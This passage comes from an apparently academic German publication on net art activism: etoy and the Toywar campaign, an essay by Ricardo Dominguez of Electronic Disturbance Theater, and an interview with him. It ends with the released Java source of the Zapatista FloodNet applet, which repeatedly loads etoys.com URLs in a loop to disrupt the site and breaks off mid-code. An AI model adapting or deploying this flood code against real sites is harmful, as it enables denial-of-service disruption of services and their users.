etoy besitzt die verbale, inhaltsleere Eleganz der Werbebranche und der ökonomisch geprägten öffentlichen Surfaces. etoy setzen den Strang der Business Art von Jeff Koons aus den 80er Jahren fort. Seine Selbstbezeichnung „Radical conservative“ zu transferieren, heißt dass es in der Kunst neue Subversionsstrategien gibt, die auf vielen Ebenen agieren und das System je nach Situation wechseln können. „radical conservative“ macht etoy zur zeitgemäßen Repräsentation des im Moment einzig möglichen Konzepts von Subversion. Revolutionäres Gebaren und Rebellion werden erwartet und bleiben wirkungslos im Kunstsystem stecken. „Radical conservative“ sind auch andere Erscheinungen der Zeit wie das Popkulturelle Quartett oder aktuelle Stilbilder in der Clubkultur. Diese Phänomene werden aufgrund ihrer scheinbaren Angepasstheit, ihrer Oberflächlichkeit, ihrer Orientierung an Business, Konsum und Luxus nicht als neuartige bedeutungsvolle Abweichung erkannt.

Die Gewalt der Businessbilder, die öffentliche Räume beherrschen, wird durch Übertreibung und der Andeutung ihres Gemacht- und Konstruiertseins gebrochen. etoy reokkupieren öffentliche Bilder und setzen neue. Sie scheuen genau wie Koons den juristischen und finanziellen Kampf nicht, weil es das Parkett ist, auf dem die Künstler aufgewachsen sind.

„We don’t count as individual artists… we are just spokes persons of etoy…the brand that infects the world with surreal information.“ (From:wunderkind@etoy.com To: PROFRICHAR@aol.com [b richard])

etoy erzeugen einen kollektiven Körper aus einer umfassenden Ästhetik, ihrer CI. Der virtuelle Körper ist in der Lage punktuell ökonomischer und juristischer Gewalt zu widerstehen. Ihre neue Organisationsform orientiert sich an Formen der Businesswelt. Damit sind sie ein Phänomen, das einen Ausdruck der Supermoderne (Augé 1992) darstellt. Diesem stehen die kollektiven Formen des Computerspiels gegenüber, die die virtuellen Körper nach einem vormodernen Prinzip des Clans oder Tribes (Maffesoli 1996) konstituieren.

Die Netzkunst besetzt, nicht sichtbar, individuelle und kollektive Körper genau umgekehrt: Sie erschafft einen anonymen kollektiven Körper, der die einzelnen Identitäten dahinter verschwinden lässt und somit schützt. Der kollektive Körper ist nicht so leicht besiegbar, wie ein Einzelkünstler, der der globalen ökonomischen Gewalt weichen muss.

Das Netzkollektiv ist eine punktuell zusammengeballte delokalisierte Masse, die sich dann wieder zerstreut. etoys Kollektivität ist eine punktuell offene, für Aktionen wie toywar, sonst verschließt sich die CI bestimmte Struktur.

Bei den Künstler-Kollektiven und -Aktivisten zeigt sich in gemeinsamen Aktionen ein Hydraphänomen: wo der Kopf eines Individuums abgeschlagen wird, wachsen sofort medusenähnlich ein neuer kollektiver Körper und neue Mitglieder aus der Netcommunity nach. Auch die Multi-Player Computerspiele im Netz zeigen diese neue Qualität, nicht mehr der Einzelkämpfer ist gefragt, sondern eine kollektive Abwehr gegnerischer Gewalt. So sind auch die Computerspiele bei aller Primitivität ein Einüben in ein gemeinsames Agieren.

Die Netzkunst definiert wie bei toywar das Computerspiel um, nutzt die Attraktivität des gemeinsamen Spiels und widersteht so einer Form von Gewalt des unsichtbaren Ökonomischen. Der punktuelle Zusammenschluss ist eine neue unverbindliche, aber doch identitätsstiftende Gemeinschaftsform. Beim Computerspiel sind die Kollektive im Zusammenspiel erkennbar. Die Netzkunst bevorzugt das zunächst unsichtbare Prinzip der kollektiven Störung und der Swarmbildung, für das dann ein Interface, eine Bildoberfläche erstellt wird. Die Netzaktivisten machen sich dabei auch die uniformen Bilder des globalen Handels zunutze und entwickeln auf dieser Basis eine wirksame kollektive Strategie der uniformen Subversion.

Literatur:
Augé, Marc: Non-lieux, Introduction a une anthropologie de la modernité.Paris 1992
Baudrillard, Jean: Der symbolische Tausch und der Tod. München 1983
Bey, Hakim: T.A.Z. The Temporary autonomous Zone. Ontological anarchy, poetic terrorism. New York 1991
Blissett, Luther/Brünzels, Sonja: Handbuch der Kommunikationsguerilla. Berlin 1998
Critical Art Ensemble. Flesh Machine: Cyborgs, Designer Babies, and New Eugenic Consciousness. Brooklyn New York 1998
Dawkins, Richard: The selfish gene. Oxford/ New York 1999
Dery, Mark: Cyber. Die Kultur der Zukunft. Berlin 1996
Fink-Eitel, Hinrich: Foucault zur Einführung. Hamburg 1989
Foucault, Michel: Die Ordnung des Diskurses : Inauguralvorlesung am Collège de France, 2. Dez. 1970, Frankfurt/Main 1974
Foucault, Michel: Überwachen und Strafen. Die Geburt des Gefängnisses, Frankfurt/Main 1977
Freyermuth, Gundolf S.: Cyberland. Berlin 1996
Kittler, Friedrich: Draculas Vermächtnis. Technische Schriften. Leipzig 1993
Levy, Pierre: Die kollektive Intelligenz. Mannheim 1997
Maffesoli, Michel: The time of the tribes. The decline of individualism in Mass society. London 1996
Mattenklott, Gert: Der „ästhetische Mensch. In: Werner Busch (Hrsg.): Funkkolleg Kunst. Eine Geschichte der Kunst im Wandel ihrer Funktionen. München 1987, S. 289-310
Rheingold, Howard: Virtual community. London 1995
Richard, Birgit (Hrsg.): Die Hüllen des Selbst. Mode als ästhetisch-medialer Komplex, KUNSTFORUM International Band 141, Juni-September 1998
Richard, Birgit /Paul Tiedemann: Internet für Kunsthistoriker. Darmstadt 1999
Richard, Birgit/ Drühl, Sven (Hrsg.): Dauer-Simultaneität-Echtzeit. KUNSTFORUM International, Heft 151, Juli 2000
Richard, Birgit: Norn Attacks and Marine Doom. In: Timothy Druckrey: Ars Electronica: Facing the Future (A Survey of two decades). MIT Press Cambridge Mass. 1999, S. 336-343
Richard, Birgit: Von der Gefährlichkeit des künstlichen Lebens: Norn Attacks und Marine Doom. In: Gerfried Stocker/Christine Schöpf: InfoWar. Ars Electronica. Wien/New York 1998 (engl./deutsch; 1999 auch in japanischer Sprache erschienen)
Walker, John A.: Art in Age of Mass Media. London 1995
Zizek, Slavoj: Liebe Dein Symptom wie Dich selbst. Berlin 1991
www. Adressen URL:
Edward.N. Luttak im FazFeuilleton zitiert in der Rohrpost 8.3.2000 gepostet von Florian Schneider
Cramer, Florian: Anticopyright in künstlerischen Subkulturen gepostet vom Autor am 29.09.2000
http://www.fcc.gov/csb/shva (satellite viewers act als download/Acrobat Reader file über link)
http://www.icann.org/udrp/udrp.htm (Uniform Dispute Resolution Policy)
Artikel aus der Telepolis www.heise.de/tp:
-Felix Stalder: Zäune im Cyberspace Telepolis 22.11.1999 Die neuesten Entwicklungen in der Schlacht um Domainnamen
– Reinhold Grether 09.02.2000 Wie die Etoy-Kampagne geführt wurde
– Reinhold Grether: Durchbruch zum Weltcode telepolis 29.04.2000
– Wolfgang Staehle, the thing Geist siegt über das Geld“ () Der Sieg der Aktivisten und der gesamten freien Internet-Community (telepolis)
– Florian Rötzer 03.12.1999: 7,5 Millionen Dollar für eine Webadresse
– Florian Rötzer 26.01.2000: eToys.com zieht die Klage gegen Etoy.com zurück. „Ein totaler Sieg für die Internetgemeinschaft“
– Florian Rötzer 03.07.1999 Network Solutions war Ziel von Crackerangriff. Besucher wurden von der Website des Monopolisten für die Domainnamenvergabe auf die von ICANN umgelenkt
– Florian Rötzer 17.01.2000 Neuer Fall von Domainnamen-Rückforderung. Sind alle Namen, die knappe Ressource im Web, Markenzeichen?
– Florian Rötzer 04.03.2000 Telepolis.sucks. Das Consumer Project on Technology hat die ICANN aufgefordert, neue Top-Level Domains zur Förderung der Kritik und der Meinungsfreiheit einzuführen
– Florian Rötzer 27.01.2000 Wieder einmal: Wem stehen Domainnamen zu? Eine britische Firma hat 15000 Namen von Städten und Dörfern mit der co.uk-Endung für sich registrieren lassen
– Pit Schultz 02.04.1997 Wem gehört das Web? Email-Interview mit Paul Garrin über sein Projekt Name.Space
– Harald Taglinger 15.07.2000 WDR sind nur drei Buchstaben
– Armin Medosch 07.06.1998 US Regierung bezieht Stellung in der Frage der Domain Names
– Monika Ermert 06.07.1999 Gegenwind vom Alten Kontinent. Widerwilliger Domain-Monopolist NSI
– James J.King 09.09.2000 Hütet Euch vor der UDRP. Hinweise für die Halter von Domain-Name
– Ted Byfield 13.07.2000 ICANN’s Selbstfaller
– Stefan Krempl 06.01.2000 Internet-Beauftragter der SPD fordert Vorgehen gegen Markengrabbing#
– Armin Medosch 14.04.2000 Network Solutions stärkt »Kundenbindung«. Versuch der Übertragung eines Domainnamens kann zu Namensverlust führen
– Michaela Simon 27.07.2000 Schön schimpfen.Unternehmen müssen sich das „.sucks.com“ gefallen lassen
– Tilman Baumgärtel (telepolis 25.08.98: Internet Art Haute Couture. A Question of Price Art teleportacia)
– Virtuelles Sit-in geht weiter Telepolis Florian Rötzer 19.12.1999 Der Kapitalismus überrollt die Wirklichkeit mit der Fiktion
– Spielzeugkriege Felix Stalder 08.12.1999
– Künstler raus! Armin Medosch 23.12.1999 Klage gegen Kunst- und Wissenschaftsnetzwerk Leonardo.
– Douglas Rushkoff 21.12.1999 Warum ETOY sich nicht durch eToys erpressen lassen sollte
Kontakt Prof. Dr. Birgit Richard b.richard@kunst.uni-frankfurt.de
www.rz.uni-frankfurt.de/fb09/kunstpaed/indexweb/start.htm
– Anne Gearan associated press 1996: Marine Doom as Training Exercise (www.tri-cityherald.com/COMPUTE/comp10.html)
-Vol. 5, No. 1232 – The American Reporter – December 28, 1999 CLASHING DOMAIN NAMES UNDERLIE UNUSUAL COURT CASE by John Grimmett and Joe Shea American Reporter Correspondent
http://www.heise.de/tp/english/inhalt/co/2469/1.html).
http://www.nytimes.com/library/tech/99/12/cyber/artsatlarge/09artsatlarge.html
radio show „off the hook“ with emanuel goldstein online http://www.2600.com/offthehook/
http://slashdot.org/article.pl?sid=99/12/01/2156208&mode=thread
http://www.heise.de/tp/english/inhalt/te/5562/1.html
http://www.tec.army.mil/TD/tvd/survey/3D_Studio_MAX.html
http://washingtonpost.com/
http://www.villagevoice.com/
http://slashdot.org/yro/99/12/01/2156208.shtml
http://www.hell.com/
http://www.couni.com
http://www.etoy.com
http://www.toywar.com
http://www.rtmark.com
http://www.airworld.net
http://www.thing.net
http://www.rhizome.org
http://www.hell.com
http://www.wired.com/news/politics/0,1283,33330,00.html). ‚Be Grateful for Etoy‘ http://www.wired.com/news/business/0,1367,33159,00.html
http://www.zdnet.com/zdtv/internettonight/netculture/story/0,4602,2408459,00.html
http://dmoz.org/Society/Activism/Media_Activism/Culture_Jam.ming/etoy/Media_Coverage/
http://www.tveyes.com/database/expands.asp?ln=526785&key=etoys.)
first tv report all over europe on 3sat 23.12.1999: 23.55 („10vor10“)
http://www.woz.ch/wozhomepage/51_52/etoy51.html
http://io.aec.at/eKillerToy/index2.html.

RICARDO DOMINGUEZ:

Postmediale Unmöglichkeiten
Oder Maya-Technologien für die Leute

Ricardo Dominguez ist Mitbegründer des Electronic Disturbance Theater (EDT) und Senior Editor of The Thing (bbs.thing.net). Als ein ehemaliges Mitglied von Critical Art Ensemble (1987 to 1994 – die Theorien des elektronischen zivilen Ungehorsams in den 80er Jahren entwickelt haben, arbeitet er im Moment mit Fake_Fakeshop (www.fakeshop.com), einer hybriden Performance Gruppe. Er präsentierte EDT’s SWARM auf der Ars Electronica’s InfoWar 1998 und schrieb für Ctheory (www.ctheory.org). EDT http://www.thing.net/ ~rdom/ecd/ecd.html Home www. thing.net/~rdom, The Thing bbs.thing.net

„Wir müssen bereit und offen für das Unerwartete sein. Nicht nur wegen des Aufkommens und der Weiterentwicklung von neuen Technologien, aber auch wegen der Art und Weise, wie die Leute sie verwenden werden. (Aus dem Protokoll des MESH)

RD: The protocols of the Mesh ( Is a book that I made up for the essay – the MESH stands for the all powerful counter Net communties. The .mil and .gov communities have been hard at work in controlling the Internet with new tools like Carnivore that the FBI uses – like Echelon. So the MESH is the name I gave all of these tools together. Net vs the MESH)

Postmediale Zellen für direkte Aktionen müssen die Instabilitäten in den Technologien aufspüren, bevor diese zu Metaphern werden. Postmediale Zellen funktionieren als oppositionelle temporäre Aktionen am Ereignishorizont unserer postfuturistischen Gegenwart. Innerhalb dieser chaotischen Sektoren der zusammenfallenden Zeit tauchen die Möglichkeiten zu größeren Störungen auf. Zellen für die direkte Tat müssen in den bürgerlichen Gesellschaften Hebel finden, die als Gewaltmultiplikatoren auch Stimmen von Machtlosen hörbar machen. Sobald Minderheiten eine geringfügige Autonomie erlangt haben, werden diese meist zum Schweigen gebracht. Jene, die darauf warten, dass die Dezentralisierung dieser Instabilitäten von selbst passiert, verlieren den Blick für die Möglichkeit, kleinere Massenstörungsgesten über verfügbare kleine Nischen zu organisieren. Wir müssen immer bereit sein, den Fluss der Ungewissheiten jenseits der verwendeten wissenschaftlichen und technologischen Diskurse, z.B. Biotechnik und Nano-Technologien zu untersuchen. Soll THE MESH an diesen Diskursen weiterarbeiten. Stattdessen lasst uns wie die Zapatistas fortfahren, die Spiegel der Macht zu durchbrechen und in andere Territorien einzusteigen.
Postmediale Zellen sollten überall unbearbeitete Instabilitäten suchen, sogar in militärischen Systemen, die ihre Kriegsmaschinen des kalten Kriegs neu aufrüsten mit Cyborg Systemen.

RD: Most of the US military have been creating cyborg soliders since the end of The cold war – Virtual Killers for tomorrow armies..what they call… *interoperable cyborg systems* So that each soldier will have their own links to the MESH and thus become a super soldier…and UberSoldier…linked to all the data…A BORG.

Postmoderner Krieg bleibt immer noch an die Paradigmen von militärischer Wissenschaft und Spektakel gebunden (zu beachten ist, dass die meisten Schritte vom Golf-Krieg bis zur Kosovo Krise für das Fernsehen und die Internetdarstellung unternommen wurden). Das endlose objektive Theater vom Kriegsdiskurs und die subjektive NATO Position, dass es nur eine Realität gäbe, ist völlig in das System eingespeist (sogar im Falle von Psy-OP Taten).

RD: psy-Op actions = Psychological Operations, Psychological Operations are tactics that are used against the enemy. To make them feel bad – or to tell them that they are better off giving up.

Unter ihren VR Helmen können sie den Ausfall der Realität aufgrund des neuen Fundamentalismus des Telematischen nicht erkennen. Sie glauben immer noch, dass die Lichter, die ihre mitternächtlichen Bomben erzeugen, wenn sie fallen, durch etwas legitimiert sind, das immer noch existiert: Nation, Gerechtigkeit und Demokratie. Diese sind jetzt nichts mehr als die letzten Zeichen von toten kulturellen Sternen. Das militärische System kniet wie die Bauern im Mittelalter immer noch vor der heiligen Leiche von THE MESH. Sie geben es sogar zu, wenn sie unter sich sind: … Da ist scheinbar wenig Interesse an diesen Entwicklungen und ihren Auswirkungen auf die nationale Sicherheit.“ In der Tat sind ihre Versuche, die nächste Zukunft vorauszusagen, erstaunlich für ihren konservativen Ansatz und für den allgemeinen Glauben, dass die Zukunft so wie heute sein wird, nur mit ein paar kleinen Verbesserungen in den Technologien. Weniger überraschend ist, das es wenige Versuche gibt, von Technologien verursachte Grundänderungen zu antizipieren, deren praktische Anwendungen bis jetzt nur von Spezialisten erörtert werden. Wir verlieren die Kriege der Zukunft damit schon jetzt.

(From the Army’s Book of the Dead, Book II)

RD: It is a made up book by me – like the Egyptian’s Book of the Dead

The MESH ist sehr damit beschäftigt, das menschliche Genom zu erfassen, um gemischte Meme – Genwaffen zu erschaffen. Sie versuchen gezielt, einzelne Genotypen herauszufinden, um selbstreplizierende Flotten von computerkontrollierten molekularen Waffen zu bauen. Nano-Technologie tauchte zuerst 1990 als Praxis der Industrieforscher bei IBM auf, als diese in der Lage waren, 35 einzelne Atome zu arrangieren, um „IBM“ auszubuchstabieren. 1991 begann die japanische Regierung damit, jährlich $ 185 Millionen für die Forschung im Bereich der Nanotechnologie im Haushalt zu veranschlagen. Seit dieser Zeit werden experimentell dreidimensionale Strukturen von der DNS produziert. Forscher haben die Möglichkeit der Konstruktion von verzweigten, nicht biologischen Eiweißen mit enzymatischer Aktivität, als eine Grundmethodologie für Nanoanwendungen demonstriert. Dieses Nano-event mischt sich unter andere MESHworks und produziert neue Aggregatzustände für die Kraftzonen von morgen. Postmediale Zellen müssen die Zukunft mit Gesten bekämpfen, die in der Gegenwart keinen Namen haben.

Mayatechnologien für die Leute

Pedrito (Tojolabal, zweieinhalb Jahre alt, ausgetragen während der ersten intergalaktischen Auseinandersetzung) spielt mit einem kleinen Auto ohne Räder und Karosserie. In der Tat scheint es mir, das, das womit Pedrito spielt, ein Stück des Holzes ist, das sie „Kork“ nennen. Aber er hat mir sehr entschieden gesagt, dass es ein kleines Auto ist, das nach Margaritas fährt, um Passagiere abzuholen.

Es ist ein grauer und kalter Januarmorgen, und wir gehen durch dieses Dorf, das heute die Delegierten (einen Mann und eine Frau) für die Beratung am 21. März wählt.

Das Dorf versammelt sich, während ein buntgescheckter Hubschrauber der mexikanischen Armee über ihm kreist und ein Flugzeug der mexikanischen Luftwaffe mit einer Serie von Tiefflügen über der Gemeinschaft beginnt. Die Versammlung wird nicht unterbrochen, jene, die sprechen, heben kaum ihre Stimmen.

Pedrito ist es leid, das Artillerieflugzeug über sich zu haben, und er geht energisch auf die Suche nach einem Stock in seiner Hütte. Pedrito kommt aus dem Haus mit einem Stück Holz und er erklärt wütend „ich schlage das Flugzeug, weil es mich sehr stört“. Ich lächle innerlich über die Unbefangenheit des Kindes. Das Flugzeug dreht über Pedritos Hütte, und er hebt den Stock und schwenkt ihn wütend gegen das Kriegsflugzeug. Das Flugzeug ändert dann seinen Kurs und fliegt in die Richtung seiner Basis. Pedrito sagt „dort jetzt“ und beginnt noch einmal mit seinem Stück Kork zu spielen, mit seinem kleinen Auto.

Das Meer und ich sehen einander in Stille an. Wir bewegen uns langsam auf den Stock zu, den Pedrito fallen ließ und wir heben ihn sorgfältig auf, um ihn zu analysieren.

„Es ist ein Stock,“ sage ich.

„Ja, das ist es“, sagt das Meer.

Ohne irgendetwas anderes zu sagen, nehmen wir ihn mit uns. Wir stoßen mit Tacho zusammen. „Und was ist das?“ fragt er auf Pedritos Stock zeigend, den wir mitgenommen haben. „Mayatechnologie“ antwortet das Meer.

Oben wird der Himmel plötzlich golden mit Wolken aus Marzipan.

El Sup (Subcommandante Marcos) versucht sich daran zu erinnern, wie Pedrito es tat, was er tat. (Der Hubschrauber oben ist ein nutzloser Zinngeier).

Für zu lange Zeit sind die hyper-memetischen Cargokulte zwischen dem Boden, der Dritten Welt, und der Spitze, der virtuellen Klasse, geflossen. Ein Kreislauf, der die Unmöglichkeiten der fünften Welten hinter der Eschatologie der designten Zukunft aufrechterhält. Postmediale Zellen müssen jetzt den Strängen der Erfindungen folgen, die aus dem normalen Zeitrahmen fallen. Um Gesten zu suchen, die die Linien des normalen Flugs unserer gegenwärtigen kollektiven Realität oder ihrer imaginären Bedingungen von Geschwindigkeit und Vernetzung durchkreuzen. Wir müssen das Unmögliche und Unerwartete als unsere Gegendialektik benutzen“, wie im Falle von Hannibal und seinen Elefanten, die gegen das römische Imperium zogen. Tensoren, die beispiellose Instabilitäten in THE MESH über unsere Gegenwart und Zukunft hinaus, schaffen können.

RD: Tensors – a made up word – that attempts define the possibility of creating strong focus points for minority voices – via the *tensions* or problems that are created with new technologies.

Diese Tensoren existieren schon unter den intergalaktischen Kindern außerhalb der Grenzen unserer sozialen Bedingungen. Postmediale Zellen müssen Situationen für die Mutation schaffen, die die Protokolle von Beschleunigung, Verbesserung und Obsoleszenz, an die der späte Kapitalismus gebunden ist, unterbrechen und umleiten können. So dass rationale Geschichte von den winzigen Händen der intergalaktischen Ninos aus der fünften Welt unterbrochen und neu gemacht wird.

Die Konfrontationen der Postmedialen Zellen sollen taktisch all die unmöglichen Einzigartigkeiten freigeben, die der Homogenisierung unter der New World Order oder Menschenrechts-Agenda zum Opfer gefallen sind, da diese zu grundlegenden Bedingungen für Hyper-Gewalttätigkeit und totale gesellschaftlicher Kontrolle geworden sind. Hier verschlingt der Sohn (Neoliberalismus) den Vater (nationales Kapital) und in diesem Prozess werden die Lügen spätkapitalistischer Ideologie zerstört: In der neuen Welt(un)ordnung gibt es weder Demokratie noch Freiheit, weder Gleichheit noch Brüderlichkeit. Die planetarische Bühne wird in ein abgestuftes Schlachtfeld transformiert, in dem jetzt das Chaos verfallener neuronaler Netze herrscht. Lassen Sie uns stattdessen in jenen perversen Kreisläufen Mutter und Kind suchen, die außerhalb des Luxus digitaler Geschichte wohnen.

Postmediale Zellen müssen anorganische Kreisläufe, Abstraktionsnetze für „distributed bodies“ schaffen, die gelöst sind von der Saat zukünftiger und gegenwärtiger Zeit. Die Schwerkraft bricht unter dem Druck der Einzigartigkeiten der Zapatistas in einer Flut von schmutzigem Materialismus zusammen. Jetzt ist es an der Zeit, dass die fünfte Welt sich tief in den virtuellen Zustand, der zum 4. Weltkrieg führt, hineinbewegt und diesem mit seinen eigenen Trajektoren den Kopf abbeißt.

Jede postmediale Tasche (pocket) sollte die Rauchsignale EL SUPs beachten:

Die scheinbare Unfehlbarkeit der Globalisierung kommt schwer gegen die sture Ungehorsamkeit der Realität an. Während der Neoliberalismus seinen Krieg verfolgt, gibt es Demonstranten, Kerne (kernels) von Rebellen, die sich überall auf dem Planeten bilden. Dem Imperium von Finanziers mit vollen Taschen stellt sich eine Rebellion der Taschen des Widerstandes gegenüber. Ja, Taschen. In allen Größen, in verschiedenen Farben, in veränderlichen Formen. Ihr einziger gemeinsamer Punkt ist der Wunsch, der „New World Order“ und den Verbrechen gegen die Menschlichkeit, repräsentiert im Vierten Weltkrieg, zu widerstehen. (Aus dem Buch der intergalaktischen Erinnerungen)

(eine kleine Frau mit einer Skimaske, die Saat in ihrer Hand hält)

Sie spricht: „Wir sind Netzwerke ohne Schwerkraft, ohne Zeit, hier fällt der Apfel hinauf.“ – Die Zapatistas

Las Futuras Die Zukünfte

Die Zapatistas wickeln den erfundenen Mayacode um die Protokolle des vierten Weltkriegs. Jedem Wort des MESH im Spätkapitalismus, jedem seiner Gesten wird der Traum Fleisch durch Firmware zu ersetzen und das Gedächtnis durch einen Kampfplatz entgegengesetzt. All dies schneidet in Billionen, die investiert wurden, um hybride Körper aus flexiblen Hierarchien und gebundenen Netzen zu synthetisieren.

Die Zapatistas bitten uns darum, Welten außerhalb der entsorgbaren Weltgeschichte der Geschwindigkeit zu bauen: Las Futuras. Hier werden die Rufe der Toten von den unverkabelten Lebenden beantwortet, ohne allgegenwärtige Infrastrukturen, ohne die Notwendigkeit, zukünftige Kriege wiederzuwählen. Hier überflutet Las Futuras die Gegenwart.

Zapatismus ist der Ereignishorizont der fünften Welt, welcher das generische Medienereignis entwirft und umleitet. Eine Umleitung der Massenzerstreuung in Richtung eines bestimmten Punkts der totalen Marktangleichung mit einer einzelnen Frage: Wie ist die Position der Maya Gemeinschaften in Chiapas, Mexiko? Diese Frage ist die konkrete Manifestation einer fremden Politik, die sich aus der Gesellschaft der Verschwiegenheit bewegt, der perfekten Diktatur des Wissens.

P.S. (eine in einer Flasche an der Kante eines schwarzen Lochs gefundene Notiz)

Geheime Bunker vs offene Theater.

Electronic Disturbance Theater sind anarchistische Befürworter der theatralisch-elektronischen Gegenschläge, bei denen der „digitale Zapatismus“ im Herzen von Doktrin und Strategie liegen soll. – Die Zapatistas (social Netwar) in Mexiko, Rand Corp. (1998)

Das Critical Art Ensemble fährt fort zu glauben, dass alle nützlichen Modelle des EDT (oder für diesen Zweck beinahe alles Politische, ausgenommen die „ein Bewusstsein und Betroffenheit schaffende pädagogische Aktion ***) innerhalb der gegenwärtigen politischen Bedingungen, die versteckte Tat und eine Abscheu gegen die Massenmedien als ein Aktionstheater gemeinsam haben.* CRITICAL ART ENSEMBLE

Die Zeit der „Guarded Society“ ist angebrochen, jeder muss die letzten Überreste des öffentlichen Raums jetzt verlassen. Nur jene, die die Wellen der Geschichte richtig erfassen können, begreifen, dass die wahre Natur des Codes und der Zeit definieren sollte, welche Gesten gemacht werden können, und wann. Jetzt empfiehlt die *Guarded Society“, dass wir alle hinter flexiblen Firewalls, mit einer Menge Luft zwischen dem Dateninneren-Kern und dem Internet verschwinden. Vergewissern Sie sich, dass Ihre Bioagenten nicht anfangen zu streunen. Nur eine Gesellschaft der Verschwiegenheit wird in der Lage sein, diese Stufe des elektronischen Theaters zu überleben.

Die Guarded Society verfolgt die Zapatista-Fluten in den Mega-Networks, die den Westen und Osten verbinden. Der Süden ist schon so weit weg, hier spricht nur die Leiche des MESH und nur wenige beherrschen die Räume öffentlichen Engagements. Nach dem Aufkommen von Netzwerken gibt jetzt einen Kampf zwischen den offenen Gesten von Network Theatern und Network- Bunkern. Network-bunkers sprechen nur den Code von weichen Verschwörungen und guter Sichtkontrolle. Der Zapatistentraum tritt in den Wettstreit mit der Agenda der Geheimnisse, weil er kreuz und quer zu Medienräumen spricht. Diese sollen zurückgeführt werden in bedeutungsvolle Räume. Zapatismo ist eine unzeitgemäße Geste innerhalb des Hauses des digital Korrekten. Die Zapatisten-Netzwerk Theater rufen nicht nach Cyber-, Net- oder Infowar, aber nach Taten des html-Aktivismus. Digitaler Zapatismo ist Simulation, wie sie sein könnte, nicht wie sie gewesen ist. Eine Geste, die die Ungleichheit von jenen unterstreicht, die interoperable Topsight Netzwerke wollen und jenen die vergessene Phantome, zukünftige Formen des Lebens und eine unmöglichen Gegenwart vernetzen.

*Um in einer interkontinentalen R/realität anzukommen, muss jeder seinen und jede ihren eigenen Weg machen.*

– 2. Erklärung der La Realidad

Birgit Richard: Übersetzung, redaktionelle Bearbeitung

INTERVIEW RICARDO DOMINGUEZ EDT

Birgit Richard: Which virtual sit-in and floodnet tools did you develop for toywar and what did they do?

Ricardo Dominguez: The Toywar started with the Zapatista FloodNet – then other groups and people – like Airworld and Federation of Random Action – started to send us new toys. What each toy did was add layers of disturbance to the working process of eToys.com. Some of the toys would fill out forms and never purchase anything or use the search forms to find things we did not want.

There was a swarm thing i remember in the process of toywar, how does this kind of tool work?

These tools only work based on the number of users – the more activist join the action – the more powerful the actions of the tool. The bigger the SWARM – the better.

And is it true that you had the killerbullet applet but you decided not work with it? Why didn’t you destroy an enemy like eToys that did harm to etoy with structural acts of violence?

Yes it was true that we had a killerbullet applet – but it seemed to us EDT – that the toys we had were doing very very well – Brett Stalbaum of the Electronic Disturbance Theater wrote: „I’m not ready to trade the distributed, swarming community of activists model for a single tactical nuke.“ The point was to get across just how widespread the protest was; it was not about a terrorist attack. We did not want to be Killers like Etoys.com – but we did want to disturb them quite badly. Which we all as a SWARM accomplished.

Was there a kind of manager of the whole thing or what was the structure of the whole process?

EDT was already used to working a long term actions – we were use to working alone for two years – because not many wanted to help us in terms of the Zapatistas. So it was really great to see all these net.art and net.activist groups gather around this issue – and help build the action. But – to say that anyone of us were the manager of the whole action – is wrong. This was a network action by a many networks – no one was in control. Each of could suggest or ask for something – but, no one could say – do this now! and then do that! That is not how a SWARM works. Here is the code that was used by EDT for the Toywar –

Zapatistas FloodNet Code Release By EDT

Subject: Code for Zapatista FloodNet – adapted for etoys – for Re.no
We are networks without gravity, here the apple falls up.
– the zapatistas
The web must help the weakest and poorest,
let us redistribute the powers, reverse engineering!!
– Re.no

Many network_art_activist have not only participated in Electronic Civil
Disobedience, but have also been at the heart of moving the code forward.
One such reverse engineer for the people has been. Re.no (reno courvoisier),
a member of FEDERATION OF RANDOM ACTION. Re.no has worked with
Electronic Disturbance Theater, rt@mark, etoy.com and is currently
developing tactics in support of Leonardo (http://leonardo.c3.hu/ ). But,
most importantly Re.no led the VR-Sit In against OCCIDENTAL PETROLEUM ( Oxy
and CdnOxy ) and FIDELITY INVESTMENTS that invests in Oxy (with Al Gore’s
own half million dollar worth of Oxy stock via Fidelity) and in support of
the U’wa on February 3, 2000:

*The U’wa of the Colombian cloud forest are in a life-and-death struggle to

protect their traditional culture and sacred homeland from an oil project slated to begin

on their land at anytime. The U’wa are adamantly opposed to the drilling and warn that the project will lead to an increase in violence as seen in other oil regions of Colombia. Despite this, Los Angeles-based Occidental Petroleum and the Colombian government continue to move forward with plans to drill. http://www.ran.org/

Re.no answered The U’wa’s call for international support.and action to bear witness to this act of destruction. The Sit-In created a disturbance that was so effective that Fidelity Investment in an act of cyber vigilantism shut down The Federation of Random Action’s URL. An aggressive tactic by e-commence that will continue to grow in use against non-violent, network activism. In honor of the work done by Re.no, and the many others like him, the Electronic Disturbance Theater is releasing the code from the Zapatista FloodNet during the Etoys vs. Etoy actions.
Zapata Vive!!

+++++++
http://www.thing.net/~rdom/ecd/ecd.html
+++++++

/*
zapatistaFlood – adapted for etoys
*/
import java.applet.*;
import java.awt.*;
import java.net.URL;
import java.net.MalformedURLException;
import java.util.*;

/*
* This applet displays image.gif and calls fake urls to a frame called
„target“ + repeatedly
calls urls into named html frames „target2“, „target3“, and „target4“
*/

public class etoyFlood extends Applet implements Runnable {
Image image;
SendMessageEtoyNet sendspam;
Thread runner;
String theplace=null;

public void init() {
image = getImage(getCodeBase(), „image100x75.gif“);
sendspam = new SendMessageEtoyNet(getAppletContext());
theplace = „http://www.etoys.com/“;
}

public void start() {
if (runner==null) {
runner=new Thread(this);
runner.start();
}
}

public void stop() {
if (runner!=null) {
runner.stop();
runner=null;
}
}

public void run() {
while (true) {
sendspam.engage(theplace, „target2“);
try {Thread.sleep(2500);}
catch (InterruptedException e) {}
sendspam.engage(theplace, „target3“);
try {Thread.sleep(2000);}
catch (InterruptedException e) {}
sendspam.engage(theplace, „target4“);
try {Thread.sleep(3000);}
catch (InterruptedException e) {}
}
}

public void paint(Graphics g) {
//Draw image at its natural size first.
g.drawImage(image, 0, 0,100,75, this); //100×75 image
}
}

//sends URL
class SendMessageEtoyNet extends Frame {
AppletContext appletContext;
String badUrlString= new String();
FormURLetoyNet formurl= new FormURLetoyNet();
public SendMessageEtoyNet(AppletContext appletContext) {
super(„TPS“);
this.appletContext = appletContext;

}

// engage
public void engage(String str, String frame) {
URL url = null;
try {
url = new URL(str+formurl.getstring());
} catch (MalformedURLException e) {
System.out.println(„Malformed URL“);
}
if (url != null) {
appletContext.showDocument(url, frame);
} else {
System.out.println(„Null URL“);
}
}

}

// forms URL- in this version it just returns a randon extention for the

base url
// from a database of good and bad urls – conceptually specific to etoys


// should be modified for other causes:-)
//
class FormURLetoyNet {
Random randy;
int i;

String[] l1 = {
